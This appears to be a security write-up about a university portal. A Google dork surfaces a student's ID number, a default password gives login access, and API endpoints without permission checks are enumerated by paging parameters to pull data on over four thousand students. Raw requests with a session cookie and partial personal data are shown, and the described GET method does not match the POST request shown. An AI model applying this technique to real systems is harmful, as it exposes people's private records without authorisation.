How a Simple API Parameter Leak Exposed Thousands of Student Records

0x00 Vulnerability Cause

The issue started when a PDF containing a student's personal information was found via a Google dork (inurl:xxx.edu.cn pdf). The PDF revealed a student's ID and ID number, and the university's unified login used the last six digits of the ID number as the default password, allowing direct login.

After logging in, only the "daily affairs" module was accessible.

0x01 Vulnerability Discovery

Testing revealed no SQL injection or file upload vulnerabilities, but many endpoints lacked permission checks. A feedback API was found, and a crafted request was sent.

POST /api/apps/feedback HTTP/1.1
Host: xxx.xxx.xxx:80
Content-Length: 79
Accept: application/json, text/plain, */*
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36 Edg/110.0.1587.41
Content-Type: application/json;charset=UTF-8
Origin: http://xxx.xxx.xxx:80
Referer: http://xxx.xxx.xxx:80/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6,ko;q=0.5,zh-TW;q=0.4
Cookie: sid=7e670c0c-9529-4a1b-87b6-6c6aec4edbc1
Connection: close

{"jybh":"d997E5ee-17B6-6C9A-13c1-83EAFE09F831","bt":"1","yddh":"11","jynr":"1"}

The API required additional parameters pageNum and pageSize. By appending them, the response returned a single student's information. Adjusting these parameters revealed more records.

0x02 Deep Exploitation

Further testing showed that the information leak stemmed from the system's API design. By switching the request method to GET and removing the request body, the attacker could enumerate records using the pageNum and pageSize parameters.

POST /api/base/user/basic/update HTTP/1.1
Host: xxx.xxx.xxx:80
Content-Length: 748
Accept: application/json, text/plain, */*
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36 Edg/110.0.1587.41
Content-Type: application/json;charset=UTF-8
Origin: http://xxx.xxx.xxx:80
Referer: http://xxx.xxx.xxx:80/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6,ko;q=0.5,zh-TW;q=0.4
Cookie: sid=7e670c0c-9529-4a1b-87b6-6c6aec4edbc1
Connection: close

{"yhbh":"xxxxxxxxxxxx","xm":"xxx","nc":"1","zt":"0","pxh":0,"yddh":"189xxxxxxx","dzyx":"xxxxxxxxxxxx","qq":null,"wechatUnion":null,"wechatOpenid":null,"salt":"test","xbm":"1","yhlx":"0","tx":"xxxxxxxxxxxx_avatar","pf":"defaultSkin","bmmc":"19xx1","bmbh":"xxxxxxxxxxxx","jzbmbh":[],"yhjs":["XS"],"positionIds":null,"userLog":{"bh":"7d83f326-7cee-4ad4-b242-17faef9fdc90","yhbh":"xxxxxxxxxxxx","dlsj":"2023-02-12 23:12:40","tcsj":"2023-02-13 11:22:25","khdczxt":"Windows","khdllq":"Chrome-110.0.0.0","khdipdz":"117.92.247.178","khdlx":"PC"},"gwbh":[],"gwmc":[],"sfzjh":null,"personalSkin":null,"personalSkinThum":null,"value":null,"id":"xxxxxxxxxxxx","nickname":"1","phone":"18xxxxxx","email":"[email protected]"}

Using three‑level directory paths allowed access, while deeper paths were blocked. By setting pageNum=1‑5 and pageSize=1000, the attacker extracted up to a thousand records per request, ultimately obtaining personal data for over four thousand students.

0x03 Vulnerability Summary

1. Effective information gathering, such as obtaining default credentials, can be crucial for finding vulnerabilities.

2. Persistence is essential; repeated testing eventually uncovered the leak.

3. When an API endpoint is discovered, probing it with different parameters often reveals unintended data exposure.